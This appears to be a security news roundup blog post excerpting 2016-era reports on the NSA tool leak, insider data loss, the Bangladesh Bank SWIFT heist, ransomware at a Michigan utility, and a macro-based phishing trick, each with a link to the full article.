Transparency has its limits!
Some of the most powerful espionage tools created by the National Security Agency’s elite group of hackers have been revealed in recent days, a development that could pose severe consequences for the spy agency’s operations and the security of government and corporate computers.
“Without a doubt, they’re the keys to the kingdom,” said one former NSA employee, who spoke on the condition of anonymity to discuss sensitive internal operations. “The stuff you’re talking about would undermine the security of a lot of major government and corporate networks both here and abroad.”
Click here for the full article in the Washington Post.
Insider threats are behind the sharp increases over the past 18 months in the percentage of organizations that have experienced loss of company data. According to the Ponemon Institute, three out of every four organizations (76%) have been hit over the past two years—a significant increase from 67% in a 2014 study.
The findings show that the rise is due in large part to compromises in insider accounts—a phenomenon exacerbated by an increase in the proportion of employees who have unnecessary access to sensitive data. Respondents say insider negligence is more than twice as likely to cause the compromise of insider accounts as any other culprits
More from InfoSecurity Magazine by clicking here.
Australia has set up a cyber-intelligence unit to identify terrorism financing, money laundering and financial fraud online, the government said on Tuesday, because of “unprecedented” threats to national security.
The measure expands on a major platform of conservative Prime Minister Malcolm Turnbull, who narrowly won re-election last month after promising to improve Australia’s cybersecurity and transform the economy into a tech-savvy business hub.
Justice Minister Michael Keenan said the new unit, set up under money-tracking agency the Australian Transaction Reports and Analysis Centre (AUSTRAC), would investigate online payment platforms and financial cybercrime to crack down on money-laundering and criminal networks.
“We know that the use of fraudulent identities continues to be a key enabler of serious and organized crime and terrorism,” Keenan said in a statement.
See the full article by clicking here.
Though the police here have released little information about Gavin Long, a deeper portrait is beginning to emerge, based on a large trail left online.
Many of these digital breadcrumbs — web posts, YouTube videos and podcasts — are tied to Mr. Long’s given name, or some version of a new name, Cosmo Ausar Setepenra, which he filed court documents in Missouri to adopt in May 2015.
There is evidence that he sought to do the right thing, pursuing higher education and serving his nation. There is also evidence of paranoid thinking, and an interest in shedding blood to advance the cause of oppressed peoples.
In an interview with a podcast host in March, Mr. Long identified himself as a member of the online community of so-called targeted individuals, people who believe they are being harassed with mind-control weapons and by armies of stalkers.
Read the whole article via The New York Times by clicking here.
Last year, CIO, CSO and PricewaterhouseCoopers released a new Global State of Information Security survey, which polled more than 10,000 executives from 127 countries about IT security. The results were a mixed bag, with security incidents up 38% over 2014 but corresponding budgets rising only 24%.
This finding reflects common corporate psychology that cybersecurity is a cost center and a drain on resources – a Cisco survey of over 1,000 executives also found that 74% of respondents in the U.S. said that the main purpose of cybersecurity is to reduce risk instead of enable growth. I’ve found that people tend to think of cybersecurity as costly, complex, inefficient, and a damper on productivity. Many people believe it may not actually work or mitigate risk. This can result in security measures being implemented piecemeal without any overarching policy, resulting in costly but poor integration.
See the whole article at Forbes.com by clicking here.
In a study published Thursday in the journal Science, Dr. Johnson and Miami colleagues searched for pro-Islamic State posts each day from mid-2014 until August 2015, mining mentions of beheadings and blood baths in multiple languages on Vkontakte, a Russia-based social media service that is the largest European equivalent to Facebook. Ultimately, they devised an equation that tries to explain the activity of Islamic State sympathizers online and might, they say, eventually help predict attacks that are about to happen.
Read the whole article from The New York Times here
A water and electricity authority in the State of Michigan, Lansing’s Board of Water & Light, needed a week to recover from a ransomware attack that hit its enterprise systems recently.
The successful phishing attack on its corporate systems, which was first noticed on April 25, forced the utility to keep systems, including phone servers, locked down since then.
More on this story is available from Smart Grid News by clicking here.
Investigators suspect that malicious software code allowing hackers to withdraw the money could have been installed several weeks before the incident. Malware gave hackers an inside look at the bank’s systems.
The hackers appeared to have stolen Bangladesh Bank’s credentials for the SWIFT messaging system, which banks around the world use for secure financial communication.
Investigators believe the attack was sophisticated, describing the use of a “zero day” and referring to an “advanced persistent threat.”
More from Fortune magazine by clicking here.
Experian’s just released third annual Data Breach Industry Forecast report for 2016 predicts that big hacks will continue to grab the headlines, but small breaches will cause “a lot more damage.”
“Whether it’s a true malicious insider, or just employee negligence, 80 percent of the breaches we’ve worked so far in 2015 have been [caused by] employees … and I don’t think that’s going to change in the healthcare field and other fields,” says Michael Bruemmer of Experian Data Breach Resolution.
“One popular social engineering trick to entice users to enable macros, is to make the user believe that the document contains secret or confidential information, and that the user needs to take action to reveal this information,” Didier Stevens explained.
The Word document will contain a message that the content is hidden (or encoded, or encrypted, …) and that the user needs to enable the content (or the macros) to visualize it. This function will change the font color from white to black (thereby “revealing” the hidden information) and remove the header that instructs the user to enable the content.
Effectively, this function will make you believe that nothing out of the ordinary happened, and that your action simply allowed you to read the document. What you won’t know or notice is that a malicious payload is downloaded and executed in the background, and your computer has been compromised.
More from HelpNetSecurity by clicking here.